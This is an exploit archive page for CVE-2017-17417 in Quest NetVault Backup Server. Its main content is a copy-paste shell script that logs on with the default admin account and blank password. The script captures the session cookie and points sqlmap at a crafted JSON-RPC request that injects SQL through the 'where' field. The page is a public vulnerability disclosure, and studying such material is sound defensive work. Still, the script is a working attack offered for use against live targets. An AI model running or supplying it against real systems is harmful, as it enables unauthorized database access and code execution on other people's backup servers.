what you don't know can hurt you

Quest NetVault Backup Server Code Execution / SQL Injection

Quest NetVault Backup Server Code Execution / SQL Injection
Posted Feb 22, 2019
Authored by rgod, Chris Anastasio

Quest NetVault Backup Server versions prior to 11.4.5 suffer from process manager service SQL injection and remote code execution vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection
advisories | CVE-2017-17417
MD5 | 4f000d15da674df9aa20ea5e062d99c2

Quest NetVault Backup Server Code Execution / SQL Injection

Change Mirror Download
# Exploit Title: Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
# Date: 2-21-2019
# Exploit Author: credit goes to rgod for finding the bug
# Version: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417

# There is a decent description of the bug here: https://www.zerodayinitiative.com/advisories/ZDI-17-982/
# but no PoC, hence this submission. Also the description states that authentication is not required.
# I did not find the auth bypass, but the target was using default credz
# of admin and a blank password.
#
# "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
# of Quest NetVault Backup. Authentication is not required to exploit this vulnerability.
#
# The specific flaw exists within the handling of NVBUPhaseStatus Acknowledge method requests.
# The issue results from the lack of proper validation of a
# user-supplied string before using it to construct SQL queries. An attacker can leverage this
# vulnerability to execute code in the context of the underlying database."



# Fill out the variables then copy paste everything below this line into a kali terminal

#target ip address
target=x.x.x.x

#target port
port=8443

#username
username=admin

#password is blank by default!
password=
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{\"jsonrpc\":\"2.0\",\"method\":\"Logon\",\"params\":{\"OutputFormat\":\"pretty\",\"UserName\":\"$username\",\"Password\":\"$password\"},\"id\":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close